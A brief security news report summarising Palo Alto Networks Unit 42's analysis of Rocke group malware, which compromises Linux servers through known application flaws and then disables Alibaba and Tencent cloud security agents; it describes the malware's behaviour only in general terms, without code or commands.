Palo Alto Networks’ Unit 42 reveals that it came across samples of malware used by a group called Rocke to infiltrate into Linux systems and look for five different cloud security products that could block further malicious activities on the compromised hosts.
The analysis reveals that successful attacks launched by Rocke first require them to exploit vulnerabilities found in other software solutions that would allow them to deploy the malware. Flaws in Apache Struts 2, Oracle WebLogic, and Adobe ColdFusion are being used.
Once the host has been compromised, the malware downloads a script called a7 on the system and enables persistence using cronjobs.
Furthermore, it can kill all the other mining processes running on the same host, block other malware with iptables rules, hide its malicious process, and uninstall agent-based cloud security products.
Given the malware targets mostly security products developed by Alibaba and Tencent, most attacks are believed to be carried out in China, though it could very well be expanded to other regions as well. Both companies have already been informed of the attacks in order to block potential exploits.
Submitted by: Arnfried Walbrecht